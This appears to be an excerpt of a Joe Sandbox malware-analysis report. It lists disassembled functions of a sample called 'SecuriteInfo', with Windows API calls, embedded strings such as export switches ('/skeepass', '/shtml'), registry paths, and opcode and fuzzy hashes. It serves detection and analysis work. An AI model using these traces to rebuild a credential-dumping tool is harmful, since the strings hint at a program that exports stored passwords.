                                                              • API String ID: 3356672799-1717621600
                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4066021378-1856150674
                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A47B
                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              APIs
                                                              Strings
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • out of memory, xrefs: 0042F865
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • database is already attached, xrefs: 0042F721
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                              • free.MSVCRT ref: 004185AC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                              • String ID:
                                                              • API String ID: 2802642348-0
                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              APIs
                                                              Strings
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              • <%s>, xrefs: 004100A6
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
